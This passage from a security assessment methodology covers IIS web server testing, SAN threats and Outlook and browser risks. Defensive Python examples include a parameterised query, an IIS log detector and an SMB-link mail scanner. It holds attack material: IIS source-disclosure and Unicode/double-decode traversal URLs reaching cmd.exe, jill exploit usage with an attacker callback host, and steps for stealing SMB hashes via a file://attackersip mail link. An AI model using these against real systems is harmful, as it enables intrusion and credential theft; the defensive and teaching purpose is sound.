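    sql = "select * from authentication where name = '" + name + "'"
    return con.execute(sql).fetchall()


def lookup_escaped(con, name):
    """Quote-doubling countermeasure from the list above (Replace(..., "'", "''")).
    The value stays inside one string literal, so this payload is neutralised,
    but the protection only holds for quoted string contexts."""
    sql = "select * from authentication where name = '" + name.replace("'", "''") + "'"
    return con.execute(sql).fetchall()


def lookup_param(con, name):
    """Hardened form: the value travels as a bound parameter and can never change
    the statement's structure, whatever characters it contains."""
    return con.execute("select * from authentication where name = ?", (name,)).fetchall()


def lookup_by_slno(con, raw):
    """Numeric input is not protected by quoting: validate it (the IsNumeric()
    advice above) and then still bind it. int() rejects anything but a number."""
    try:
        slno = int(raw)
    except ValueError:
        raise ValueError("slno must be an integer, got %r" % raw) from None
    return con.execute("select * from authentication where slno = ?", (slno,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, PAYLOAD))   # leaks ('abc', 1, 1)
    print("quote-doubled:", lookup_escaped(db, PAYLOAD))  # []
    print("parameterised:", lookup_param(db, PAYLOAD))    # []
```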
Q.16 REFERENCES
R WEB APPLICATION SECURITY (CONTINUE...) WEB SERVER SECURITY ASSESSMENT
R.1 MICROSOFT INTERNET INFORMATION SERVER
Description
Microsoft Internet Information Server has a long history of vulnerabilities. By its nature, up to IIS version 5.0 it provides various services by default; this has been fairly limited in IIS version 6.0. IIS security testing can be divided into three major categories: 1. Information Disclosure, 2. Buffer Overflow and 3. File System Traversal.
Microsoft has provided service packs from time to time, and an attacker takes advantage of missing patches. Most of the time people apply service packs but miss the hot fixes.
Another important aspect to consider while testing the security of IIS is the firewall. Several times you may find a vulnerability and a related proof-of-concept tool, but it may be blocked at the firewall because the required port is not open.
R.1.1 Summary
Extension | Requirement | Vulnerability | GET Request | Expected Response | Prerequisite | Reference
.asp | ASP and HTTP related functionality | Buffer Overflows | | | | Search www.Microsoft.com MS02-018
.htr | To reset password from Internet | Reveals source code | /default.asp+.htr | 200 OK | default.asp | Search www.Microsoft.com MS01-04
.idc | Internet Database Connector | Reveals directory path | /null.idc | 500 error | | Search www.Microsoft.com Q193689
.stm, .shtm, .shtml | Server Side Include | Remote Buffer overflow | /<file>.stm, .shtm, .shtml | 200 OK | Requested file must be present | Search www.Microsoft.com MS01-044
.printer | Printing from Internet | Remote Buffer overflow | /null.printer | 500 Internal Server Error | | Search www.Microsoft.com MS01-023
.htw | Highlight text in web page (Index Server) | Reveals source code | /null.htw | 200 OK "The format of the QUERY_STRING is invalid" | | Search www.Microsoft.com MS00-006
.ida, .idq | Index Server | Remote Buffer overflow | /null.ida, /null.idq | 200 OK "The IDQ file… could not be found." | Index Server | Search www.Microsoft.com MS01-033
FrontPage Server Extension | FrontPage Server Extension 2000, Visual Studio RAD | Remote Buffer overflow | /_vti_bin/_vti_aut/fp30reg.dll | 501 Not Implemented | FrontPage Server Extension | Search www.Microsoft.com MS01-035
WebDAV | Web DAV | Remote root exploit | Remote Exploit | "Successful, attempting to join shell ..." | | www.k-otik.com
WebDAV | Web DAV | Remote DoS attack | Remote DoS Attack | "Web Server is DoSsed! Now run !! F-B-eyee shall be after j00..." | search Method is allowed | www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-018.asp; The exploit is available at www.k-otik.com
R.1.2 Information Disclosure
R.1.2.1 ASP ::$DATA BUG
It occurs because of an error in the way IIS parses files. A crafted request allows the contents of server-side files to be displayed. Type http://www.target.com/default.asp::$DATA in your browser and it will display the source code of the default.asp file.
Prerequisites:
1. IIS version below 3.0
2. File has to be on an NTFS partition and should have read access
R.1.2.2 ASP DOT BUG
Displays ASP source code by appending one or more dots to the end of the URL.
http://www.target.com/products.asp.
At the end of the above URL an extra dot is added. IIS is not able to handle this request well and reveals the source code.
Prerequisites:
1. Up to IIS 3.0
2. Read access to the desired resource.
R.1.2.3 +.HTR BUG
Reveals the source code by appending +.htr to the end of the request.
http://www.target.com/abc.asp+.htr
Prerequisites:
1. IIS 4.0 before Windows NT 4.0 Service Pack 6a Security Rollup Package (SRP)
2. IIS 5.0 up to SP2, before Windows 2000 Security Rollup Package 1
R.1.2.4 .IDC, .IDA AND .IDQ BUGS
Similar to the .asp bug, but this time you get the directory path of IIS instead of the source code.
http://www.target.com/abc.idc
This results in the full path, which can be used to find further holes:
C:\inetpub\wwwroot\abc.idc not found
The same applies to .idq and .ida files:
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Prerequisites:
IIS 5.0 without any service pack.
R.1.2.5 ISM.DLL BUFFER TRUNCATION
Displays the source code of scripts and the contents of files by appending spaces in hexadecimal and .htr to the URL.
http://www.target.com/global.asa%20%20(...<=230)global.asa.htr
It reveals the source code of global.asa.
Prerequisites: IIS 4.0 and 5.0
R.1.2.6 NT SITE SERVER ADSAMPLES BUG
Displays site.csc, which contains the DSN, UID, PASSWORD etc.
http://www.target.com/adsamples/config/site.csc
Prerequisites:
R.1.2.7 TRANSLATE:F BUG
If someone makes a request for an ASP/ASA or any other scriptable page and adds "Translate: f" to the headers of the HTTP GET, they end up with the complete ASP/ASA source code.
Prerequisite: Windows 2000 without SP1 installed
R.1.2.8 NULL.HTW
This vulnerability can reveal the source code of a server-side ASP page. The ASP page may contain valuable information such as usernames and passwords.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction and CiHiliteType are the three variables of null.htw. Null.htw takes user input in these three variables. The result is the source code of the default.asp file.
Prerequisites:
1. Index Server
2. null.htw
R.1.2.9 WEBHITS.DLL & .HTW BUG
Displays the source code of ASP and other scripts.
http://www.target.com/nosuchfile.htw
If you get the error "format of the QUERY_STRING is invalid", the server is vulnerable.
Prerequisite: control of the CiWebhitsfile argument
As the user controls the CiWebhitsfile argument passed to the .htw file, he can request whatever file he wants.
The .htw files can be found in the following locations on different IIS web servers:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw
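Detection on the defender's side: the probes in R.1.2 above (trailing dot, +.htr, .idc/.ida/.idq, .htw, site.csc, the ISM.DLL %20 runs) and the traversal encodings described in R.1.5 below all leave distinctive request paths in the IIS log. The following script is an added example and is not part of ISSAF or of any tool it references: it parses W3C extended log lines (a constructed sample log, with client addresses from the 192.0.2.0/24 documentation range) and flags those patterns; it also matches %252f, the double-encoded forward slash, alongside the %255c the text describes. The Translate: f header of R.1.2.7 is not written to standard W3C logs and so cannot be detected this way.

```python
import re
from collections import Counter

# Constructed sample of an IIS W3C extended log (not a real server log). Addresses are
# from the 192.0.2.0/24 documentation range; the first and last entries are benign.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-01-01 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-01-01 00:00:01 192.0.2.10 GET /products.asp - 200
2004-01-01 00:00:02 192.0.2.77 GET /products.asp. - 200
2004-01-01 00:00:03 192.0.2.77 GET /abc.asp+.htr - 200
2004-01-01 00:00:04 192.0.2.77 GET /abc.idq - 404
2004-01-01 00:00:05 192.0.2.77 GET /null.htw CiWebhitsfile=/default.asp&CiRestriction=none&CiHiliteType=full 200
2004-01-01 00:00:06 192.0.2.77 GET /adsamples/config/site.csc - 200
2004-01-01 00:00:07 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2004-01-01 00:00:08 192.0.2.77 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2004-01-01 00:00:09 192.0.2.10 GET /images/logo.gif - 200
"""

# (rule name, log field, case-insensitive regex). Each pattern comes from a bug in R.1.2
# or R.1.5; %252f is the double-encoded forward slash, added alongside %255c from the text.
RULES = [
    ("trailing-dot source disclosure", "cs-uri-stem", r"\.(asp|asa)\.+$"),
    ("+.htr source disclosure",        "cs-uri-stem", r"\+\.htr$"),
    ("ISM.DLL truncation (.htr)",      "cs-uri-stem", r"(%20){2,}.*\.htr$"),
    (".idc/.ida/.idq path disclosure", "cs-uri-stem", r"\.(idc|ida|idq)$"),
    ("webhits .htw request",           "cs-uri-stem", r"\.htw$"),
    ("adsamples site.csc",             "cs-uri-stem", r"^/adsamples/config/site\.csc$"),
    ("unicode traversal",              "cs-uri-stem", r"%c0%af|%c1%9c"),
    ("double-decode traversal",        "cs-uri-stem", r"%25(5c|2f)"),
]
COMPILED = [(name, field, re.compile(rx, re.IGNORECASE)) for name, field, rx in RULES]


def parse_w3c(text):
    """Yield (line_number, record) for each data line, using the #Fields directive
    to name the space-separated columns."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                     # malformed line; a real parser would report this
        yield lineno, dict(zip(fields, values))


def scan_w3c_log(text):
    """Return one finding dict per (line, rule) match, in log order."""
    findings = []
    for lineno, rec in parse_w3c(text):
        for name, field, rx in COMPILED:
            if rx.search(rec.get(field, "")):
                findings.append({"line": lineno, "rule": name,
                                 "c-ip": rec.get("c-ip", "-"),
                                 "stem": rec.get("cs-uri-stem", "-")})
    return findings


def hits_per_client(findings):
    """Aggregate findings by client address, which is what an analyst triages first."""
    return dict(Counter(f["c-ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_w3c_log(SAMPLE_LOG):
        print(f"line {f['line']:>3}  {f['c-ip']:<12} {f['rule']:<32} {f['stem']}")
    print(hits_per_client(scan_w3c_log(SAMPLE_LOG)))
```

On the sample log every request from 192.0.2.77 trips exactly one rule while the two benign requests trip none; on a real log the stem field is whatever the server wrote, so check whether your IIS version logs the stem raw or already decoded before relying on the %-encoded patterns.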
R.1.3 Buffer overflow
R.1.3.1 WEBDAV REMOTE ROOT EXPLOIT
If IIS 5.0 is unpatched, there is a good chance that a simple overflow will give the attacker root. The exploit written by Schizoprenic is available on www.k-otik.com. It is again a canned exploit, and if its output gives you something like
Successful, attempting to join shell ...
the server is vulnerable. The administrator's first priority should be to apply the patch on the affected server.
R.1.3.2 WEB DAV
If the TRACE method is enabled, try the Xwbf-v0.3.exe exploit. It works on port 80 and requires a connection back from the target. Hopefully you will find that the firewall allows even connections from the target (web server) to the public network. This exploit provides root access.
A corporate firewall will not allow NetBIOS access from the public network; if it is allowed internally, SMBDie can be checked. It works after Service Pack 3; a hotfix for it is available. It reboots the Windows 2000 machine.
There is also a .htr buffer overflow against IIS 4.0 by eEye.
R.1.3.3 JILL
jill is written in UNIX C and can also be compiled for Windows 2000 using Cygwin.
$ gcc -o jill jill.c
The resulting binary can be run either from the Cygwin shell or from a Win32 console if cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>
R.1.3.4 SECHOLE REMOTE EXPLOIT
R.1.3.5 FRONT PAGE 2000 EXTENSIONS
Buffer overflow in the FrontPage 2000 Server Extensions (FPSE 2000), a set of three programs that support features such as collaborative authoring, hit counters, email form handling, and editing a web site directly on a server.
Prerequisites:
1. FrontPage Server Extensions 2000
2. Visual Studio RAD
When you install FrontPage Server Extensions 2000, fp30reg.dll and fp4areg.dll are installed by default.
When either of these DLLs receives a URL request longer than 258 bytes, a buffer overflow occurs.
Once an attacker finds that a server has these DLLs, he can use the exploit "fpse2000ex.exe".
R.1.4 DoS
As pointed out by SPI Dynamics, the vulnerability in IIS 5.0 and IIS 5.1 can lead to denial of service. The worst part is that it is remote and causes the server to restart. The proof-of-concept exploit is available at www.k-otik.com. It is a canned exploit, so do not use it on your production server. The exploit works as below:
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.
R.1.5 File system traversal
R.1.5.1 UNICODE FILE SYSTEM TRAVERSAL
Overlong Unicode (UTF-8) representations of "/" and "\" are "%c0%af" and "%c1%9c" respectively. There might even be longer (3+ byte) overlong representations. IIS decodes the Unicode after path checking rather than before. Using these representations, it is possible to use "../" to back out of the web root into the system directory and feed input to the command shell.
R.1.5.2 DOUBLE DECODE FILE SYSTEM TRAVERSAL
Doubly encoded hexadecimal characters also allowed HTTP requests to be constructed that escaped the normal IIS security checks and permitted access to resources outside of the web root.
The % character is represented by %25. Thus the string %255c, if decoded twice in sequence, translates to a single backslash. Two decodes are required here, and IIS performs two decodes on HTTP requests that traverse the executable directories.
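Both traversal bugs come down to the order of decoding and checking. As an added example (not code from ISSAF or from IIS), the following Python models the flawed order on one side and a hardened resolver on the other: a permissive two-byte UTF-8 decoder stands in for the lax decoder that turned %c0%af into a slash, the web root /inetpub/wwwroot is a constructed value, and the request paths are the ones from this section.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Constructed web root used by both resolvers; not a path taken from any real server.
WEBROOT = "/inetpub/wwwroot"


def _lax_utf8(data: bytes) -> str:
    """Permissive two-byte UTF-8 decoder that accepts overlong forms such as
    C0 AF ("/") and C1 9C ("\\"); this models the decoder behaviour R.1.5.1 describes."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))  # no overlong check
            i += 2
        else:
            out.append(chr(b))  # ASCII, or a one-to-one fallback for stray bytes
            i += 1
    return "".join(out)


def _join_under_root(rel: str, root: str) -> str:
    """Treat backslash as a separator (as IIS does), anchor under root and collapse '..'."""
    return posixpath.normpath(posixpath.join(root, rel.replace("\\", "/").lstrip("/")))


def _is_under(path: str, root: str) -> bool:
    return path == root or path.startswith(root + "/")


def vulnerable_resolve(raw_path: str, root: str = WEBROOT):
    """Models the flawed order: one percent-decode, then the traversal check, then a
    second decode pass (another percent-decode plus lax UTF-8) whose result is used to
    open the file. Returns the path that would be served, or None if the check fired."""
    stage1 = unquote_to_bytes(raw_path).decode("latin-1")   # bytes kept one-to-one
    if not _is_under(_join_under_root(stage1, root), root):
        return None                                          # only a visible ../ is caught
    final = _lax_utf8(unquote_to_bytes(stage1.encode("latin-1")))
    return _join_under_root(final, root)                     # may now lie outside root


def hardened_resolve(raw_path: str, root: str = WEBROOT):
    """Decode once with a strict UTF-8 decoder, refuse anything that would decode a
    second time, canonicalise, and only then check containment in the web root."""
    try:
        once = unquote_to_bytes(raw_path).decode("utf-8")    # overlong %c0%af is rejected
        twice = unquote_to_bytes(once).decode("utf-8")
    except UnicodeDecodeError:
        return None
    if twice != once:
        return None                                          # double encoding: refuse outright
    if "\x00" in once:
        return None                                          # embedded NUL: refuse
    full = _join_under_root(once, root)
    return full if _is_under(full, root) else None


if __name__ == "__main__":
    for req in ("/products.asp",
                "/scripts/..%c0%af../winnt/system32/cmd.exe",
                "/scripts/..%255c..%255cwinnt/system32/cmd.exe"):
        print(f"{req:<48} vulnerable={vulnerable_resolve(req)!s:<34} hardened={hardened_resolve(req)}")
```

For both encoded requests the flawed resolver passes its check and then hands the file system a path under /inetpub rather than under the web root, while the hardened resolver rejects them before any file access; the plain ../ form is caught by both, which is exactly why the encodings mattered.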
R.2 REFERENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html
R.3 INTERNET INFORMATION SYSTEM (IIS) SECURITY CHECKLIST
By Hernán Marcelo Racciatti, Hernan@oissg.org, Coordinator Open Information System Security Group, Argentina
The steps shown next are oriented to securing a server running IIS that is disconnected from the domain environment, commonly a bastion host located in the DMZ portion of a corporate network, running the IIS services.
R.3.1 Steps to Secure:
• Consider the security of the environment. Notes: DMZ, networking, border router, app server, database server, etc.
• Implement the operating system hardening checklist and apply all the pertinent security revisions. Notes: use the checklist and tools from the software provider.
• Remove the components that are not necessary. Notes: e.g. unused IIS ISAPI DLLs unmapped; remove sample web content/applications.
• The account running the HTTP service should be low privileged.
• Enable only essential web service extensions.
• Place content on a dedicated disk volume. Notes: without administrative utilities!!
• Configure NTFS permissions.
• Configure IIS web site permissions.
• Configure IIS logging, preferably in W3C format.
• Configure appropriate authentication mechanisms for relevant directories.
• Implement Secure Sockets Layer (SSL) and a certificate server.
• Install and configure a virus protection solution.
• Install and configure a host-based IDS.
• Secure well-known accounts. Notes: rename the built-in Administrator account and assign a complex password. Ensure the Guest account is disabled. Change the default account description.
• Execute the applications with “protection of IIS 6.0 applications” medium or high.
• Secure service accounts.
• Implement security in depth (IPSec filters).
• Implement IISLockdown and URLScan. Notes: IIS 4.0/5.0.
• Implement an assessment policy.
R.3.2 References
Hardening IIS 5.0
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5chk.mspx
Hardening IIS 6.0
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch08.mspx
R.4 APACHE SECURITY ASSESSMENT
R.5 GLOBAL COUNTERMEASURES
• Secure administrative access
Limit web server access to administrators and allow access only through secure authentication mechanisms. In remote management scenarios the IP addresses allowed to administer the web server should be clearly defined and the administrative processes restricted to these specific IP addresses. Administrative access should make use of a secure capability such as secure shell (SSH) or VPN.
• Harden web server
  o Web server hosts should have non-essential services disabled
  o Configure SYN cookies at OS level to protect against SYN flood attacks
  o Web server hosts must be updated with the latest security fixes for the operating system and web server software
  o Web server hosts should have the minimum number of accounts in the system
  o Remove all non-essential files such as phf from the scripts directory /cgi-bin
  o Remove all sample directories and pages that are shipped with web servers
  o Disable directory browsing, especially on folders containing scripts or executables
  o Do not assign write and script/execute permissions to the same folder
  o Disable anonymous access for the FTP service
  o Remove unused script mappings
• Secure change control procedures
  o Any change on the web server, including web page updates, patch application and hardware replacement, should be documented and authorized.
  o There should be procedures to continuously track and rectify new security issues on the deployed web server.
  o Website update procedures must be clearly defined. Do all updates from the intranet. Maintain web page originals on a server in the intranet and make all changes and updates there; then "push" these updates to the public server through an SSL connection.
• Enable logging and do periodic analysis
Log all user activity and monitor the logs. Conduct periodic analysis of system logs to detect suspicious activity.
• Audit web server periodically
Conduct periodic security audits to assess the strength of the web server. The audit can be a manual verification against a pre-defined checklist or it can be automated by tools. Periodic penetration testing of the website also adds meaningful insight into the vulnerabilities of the web server.
• Run web server in a chroot jail
  o The damage that a successful attacker can inflict can be further limited by running the web server in a chroot-ed environment. The Unix chroot system call changes the root directory of a process, such that the process can then no longer access any of the files above the specified root directory in the filesystem hierarchy. All web pages and configuration files need to be in the chroot directory.
  o Run the FTP server in a separate chrooted part of the directory tree that is different from that of the web server
  o For the Windows platform, limit the top-level root directory to an isolated directory structure with strict permissions configured
• Compartmentalize web server process
  o Use of safe application environments along the lines of Trusted Operating Systems is recommended for isolating the web server process from other system processes. This will contain attacks and prevent damage to web servers.
• Run web server as a non-root user
  o Web servers are susceptible to root compromise using buffer overflow attacks when the web server daemon is run as root. It is safer to run the web server as a non-root user to minimize damage from the attack.
• Implement web server load balancing
  o Mission-critical web sites should have multiple servers onto which the load is distributed. This will make it difficult to hog the performance of the server, thereby reducing the chances of performance-based denial of service attacks. It also adds redundancy.
S STORAGE AREA NETWORK (SAN) SECURITY
SANs were basically designed for high availability, not for security. Security of the storage is a very important issue now because of the following factors:
• Increase in the usage of SANs
• The nature of the data stored is increasing in value.
• The threat is increasing as the components are spread across diverse locations, instead of being concentrated in one place that could be physically secured.
• Firewalls provide perimeter security but do not offer internal security. Also, WAN/LAN security does not help the SAN.
• In the storage environment, the insider threat is high. 70% of security threats are from insiders.
• There are risks from snooping, unauthorized access to and modification of data, and prevention of legitimate access.
• The concept of SANs is changing because of fast growth in technology.
As the concept changes, the enterprise is looking to reduce storage management costs, achieve greater storage utilization and increase the availability of data access.
To achieve the business goals of the enterprise, the enterprise must address the confidentiality, integrity and availability of the storage.
S.1 STORAGE SECURITY CHALLENGE
S.1.1 Managerial
• Most organizations are not counting the cost of downtime and response efforts associated with breaches; they only calculate the cost of traditional network and internet access controls and defenses.
• Due to the centralized nature of corporate data, network storage resources represent prime targets.
• Storage security costs can be product capital expenditure, deployment, management and maintenance.
• The losses are due to data corruption, which can affect the company's ability to run its business and operations; stolen data can compromise intellectual property.
S.1.2 Technical
• At present, the SAN infrastructure is sufficiently complicated that attacks may not be widespread.
• But, as with the internet, security breaches will become more common as scripts become generally available and as intruders see a higher reward/(risk of being caught) ratio.
• This ratio increases dramatically with the connection of SANs to the Internet.
S.2 OBJECTIVE
• To find the storage security threats and the possible attacks on it, and to know the best practices for securing the storage environment.
• To know the importance of storage security and how we can protect it using best practices.
S.3 REQUIREMENT
• Understand the organization's environment
• Technical requirements
S.4 EXPECTED RESULT
By the end of this paper we will understand the importance of security in the storage environment, what types of attacks are possible in the SAN, and the best practices for securing storage networks.
S.5 RESOURCES AT RISK
S.5.1 Data in transit between components of the SAN
• Availability of infrastructure
• DoS
• Configuration errors
• Data integrity (loss, modification)
• Data confidentiality
S.5.2 Data at rest
• Unauthorized access
• Data integrity (deleted, modified, false creation)
• Data confidentiality
S.5.3 SAN components
• Firmware
S.5.4 Out of band management
• Authentication
• Integrity
• Confidentiality
S.6 SAN ATTACK POINTS
S.6.1 Out of band management
• LAN connection
• Control terminal interfaces
S.6.2 Inter switch links
• Remote sites
• Hosts/servers
• LAN interfaces
S.6.3 Removable media
• Physical security
S.7 STORAGE SECURITY THREATS
Possible Threats | Location of Threat
Unauthorized/unauthenticated access | Storage Network
Insecure management interfaces | Storage Management
WWN spoofing | Storage Management and Storage Network
Management control from different access points | Storage Network, Management and system
Stolen passwords | Storage Network, Management and system
Network sniffing | Storage Network
Disk, media theft | Storage System
Denial of Service attacks | Storage Network
Remote site/mirror attacks and access | Storage Network, system
Server Hosts: Access control is of primary importance here. Data both at-rest and in-flight is at risk despite the use of zoning and logical unit number (LUN) masking to segment and manage access to the storage network.
Tape media: This technology has some of the most significant vulnerability points, especially tape libraries located at remote sites. Tape and any other storage media that is accessible internally, handled by many staff, and often sent outside the confines of the data center can be vulnerable to unauthorized data access, theft or corruption.
Storage Subsystems and media: The integrity, confidentiality and availability of the data are the primary issues affecting data-at-rest.
Storage Fabric: This focuses more on access control and protection of data-in-flight.
IP and WAN: Data-in-flight is at risk as it is transferred from the storage network across IP to a secondary site.
Storage Management: Access control and data integrity can be at risk for data-at-rest and data-in-flight, since many storage management tools lack safeguards to enforce storage security.
S.8 METHODOLOGY
There are 3 threat zones that affect network storage regardless of the media used.
The threat zones are
1. Systems and connections
2. Storage Fabric
3. Subsystems and Media
The systems and connections include the computer systems such as the application and
management servers and the gateway devices that connect to the storage. The storage
Fabric consists of Hubs, Switches, Routers and the applications that connect and
manage data storage from data sources to storage arrays. The last zone consists of the
Storage subsystems and media.
S.8.1 Find the vulnerabilities in the systems and connections.
Procedure
• There is a chance that the management server is configured with default settings and unused services.
• Generally the management software of any storage device authenticates locally on the machine where the management software is installed. The authentication should actually happen at the storage array.
• The same management software can be installed on any machine on the network and used to access the storage device.
• The default passwords of some of the management software are available on the Internet.
S.8.2 Identify vulnerabilities in the storage fabric.
Procedures
• The WWN of an HBA is used to authorize client nodes to the FC switch. A WWN can be changed. By spoofing a WWN, unauthorized access can be gained to data that has been allocated to the spoofed WWN.
• With soft zoning based on the WWN, spoofing a WWN will allow an unauthorized WWN to access the information of the spoofed WWN. Even without spoofing, if an unauthorized WWN knows the route to another WWN in another zone, then by enumerating it in the fabric access can be gained.
• With hard zoning based on the WWN, spoofing a WWN will allow an unauthorized WWN to access the information of the spoofed WWN.
• With soft zoning based on the port number, if an unauthorized WWN knows the route to another WWN in another zone, then by enumerating it in the fabric access can be gained.
S.8.3 Find the vulnerabilities in the subsystems and the media.
Results
• If LUN masking is done at the client node using the HBA drivers, the client node can be allowed to view all the LUNs that it has identified.
• To do this, open the LUN masking properties of the client node, which do not have any authentication parameters, and change the settings to remove any and all masking.
• If LUN masking is done on the FC switch, then a spoofed WWN would acquire the LUN masking properties of the spoofed node, through which all the LUNs it has identified can be viewed.
• With LUN masking at the storage controller, the storage controller can expose certain LUNs to certain WWNs. In this case, by spoofing a WWN the LUN segments can be accessed.
S.9 GLOBAL COUNTERMEASURES
Best practices for data-at-rest:
• Secure data-at-rest in storage arrays, tape libraries, and NAS appliances through access control, authentication, encryption, and compression.
• Examine host-based management access points via storage management software to make sure it is secure and limits access to crucial data.
Best practices for data-in-flight:
• Examine ways to secure the storage fabric against unauthorized/unauthenticated SAN access, WWN spoofing, and different access point management controls.
• Use hardware-enforced zoning in managed storage networks.
• Examine metro SAN and WAN network connectivity to make sure data integrity is preserved, and that data is encrypted during its travels in data protection, remote replication, and mirroring technologies.
• Make sure storage networking equipment supports integration with IPSec, VLANs as well as RADIUS servers, firewalls and intrusion detection systems.
• Create a separate network infrastructure in support of the storage environment on both Fibre Channel and IP.
Best practices for data-in-flight and data-at-rest:
• Align the storage security strategy with broader corporate security strategies.
• Identify the value of the data being protected, and map the data paths within the environment that support that data, to ensure it is fully protected at-rest and in-flight.
• Determine whether or not a security stack is required to support certain types of application data, such as whether or not various classes of data need to be encrypted with different keys.
• Make sure default passwords for storage networking gear and storage management tools are changed before being placed in production environments.
• Make sure remote sites have security procedures and policies consistent with the corporate data center as well as the SAN environment.
• Consider role-based management policies for management of the storage network itself.
• Harden file and database access control by using authentication and encryption appliances.
• Evaluate security procedures prior to deploying new technologies such as iSCSI, Fibre Channel trunking, network-based virtualization tools, and FCIP.
• Evaluate the storage security hot spots to make sure full security protection is in place to support authentication, integrity, confidentiality, availability and non-repudiation.
• Consider systems and procedures around monitoring storage security events such as failures, violations and warnings.
• Test changes in configuration and new SAN fabric extensions for security holes before rolling out to production.
T INTERNET USER SECURITY
T.1 IRC SECURITY ISSUES
IRC (Internet Relay Chat) has been around for decades now. It is one of the most popular means of communication. Along with its facilities, IRC comes with insecurities as well. The following are some of the security issues related to IRC:
1. IP revelation
2. Malicious code transfer
3. P2P file sharing (DCC)
4. DoS and buffer overflows in IRC clients.
5. Trojans use IRC to connect to IRC servers and announce their presence on the victim network.
6. Social engineering attacks
Countermeasure[s]
1. Do not use IRC on production systems. It is a means of entertainment and not of productivity.
2. Disable DCC capability if IRC must be used.
T.2 INTERNET EXPLORER INSECURITIES
Ever since the birth of the internet, people have used different browsers to access it. Windows comes equipped with IE (Internet Explorer) and it becomes the default browser for most people using Windows. Another popular browser is Netscape. Of late, IE has been the target of many malicious attacks. Georgi Guninski is one of the pioneers in research on IE vulnerabilities. He has listed many vulnerabilities and their tests on his excellent security page, which one must see for browser testing.
Steps to be taken
1. For Internet Explorer testing go to http://www.guninski.com/browsers.html
2. For Netscape testing go to http://www.guninski.com/netscape.html
Countermeasures
Apply the suggested patches
T.3 MICROSOFT OUTLOOK INSECURITIES
Outlook is one of the most frequently used programs for email. It has various vulnerabilities which can be used for malicious purposes, ranging from infecting a system with a worm to remotely grabbing SMB hashes. Examples are worms like "I love you" or "Melissa", which abused Outlook's settings. Here we will demonstrate a way to grab SAM hashes from a remote machine by sending a mail.
Pre-requisite
1. HTML parsing must be allowed (which it is by default).
Steps to be performed
1. Send the target a mail in HTML format with an image link like
<a href="file://attackersip/images/image.gif">
2. Fire up L0phtCrack's SMB capture utility.
3. As soon as the victim opens the mail, Outlook tries to access the file using the current user's credentials.
4. Capture the SMB challenge exchange and crack it.
Example/Results
<screenshot>
Observation:
The attacker was able to grab the SMB hashes from the wire by just sending one mail.
Countermeasure[s]
Disable HTML parsing in Outlook.
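A mail-gateway or mail-client check for this attack, added here as an example (not from ISSAF or from any product): it parses an HTML body and reports every fetchable reference that would make a Windows client open an SMB connection, i.e. a file: URI naming a host or a bare UNC path. The sample message body is constructed; attackersip is the placeholder from the step above and example.net is a reserved example domain.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes through which a mail client fetches a resource while rendering HTML.
FETCH_ATTRS = {"src", "href", "background", "data", "poster"}


def is_smb_reference(value: str) -> bool:
    """True when a URL would make a Windows client open an SMB connection: a file: URI
    that names a host (file:///C:/x is local and does not count), or a bare UNC path
    such as \\\\host\\share\\x."""
    v = value.strip()
    if v.startswith("\\\\"):
        return True
    parts = urlsplit(v)
    return parts.scheme.lower() == "file" and bool(parts.netloc)


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, value) for every attribute that causes a fetch."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in FETCH_ATTRS:
                self.refs.append((tag.lower(), name.lower(), value))


def find_smb_references(html: str):
    """Return every (tag, attribute, value) in the HTML body that points at an SMB share.
    The tag is reported so a reviewer can tell an <img> fetched at render time (the case
    the text describes, no click needed) from an <a> that needs the user to click."""
    p = _RefCollector()
    p.feed(html)
    p.close()
    return [r for r in p.refs if is_smb_reference(r[2])]


# Constructed sample message body; example.net is a reserved example domain and
# "attackersip" is the placeholder used in the step above.
SAMPLE_BODY = """
<html><body>
<p>Quarterly figures attached.</p>
<img src="https://www.example.net/logo.gif" width="1" height="1">
<img src="file://fileserver.example.net/images/image.gif">
<a href="file://attackersip/images/image.gif">report</a>
<table background="\\\\fileserver.example.net\\share\\bg.gif"><tr><td>x</td></tr></table>
<a href="https://www.example.net/report">report</a>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, value in find_smb_references(SAMPLE_BODY):
        print(f"<{tag} {attr}> -> {value}")
```

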